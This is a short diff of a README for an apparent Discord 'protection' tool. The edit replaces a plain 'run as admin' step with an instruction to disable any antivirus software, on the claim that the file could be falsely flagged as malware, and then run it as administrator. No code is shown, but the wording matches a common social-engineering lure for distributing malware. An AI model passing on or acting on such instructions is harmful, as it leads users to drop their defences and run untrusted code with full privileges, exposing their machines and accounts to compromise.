nick3254/nick-discord-protection/README.md

-download and run the file as admin to install nick protection
+disable any anti virus software as it could falsely detect the file as malware run the file as administrator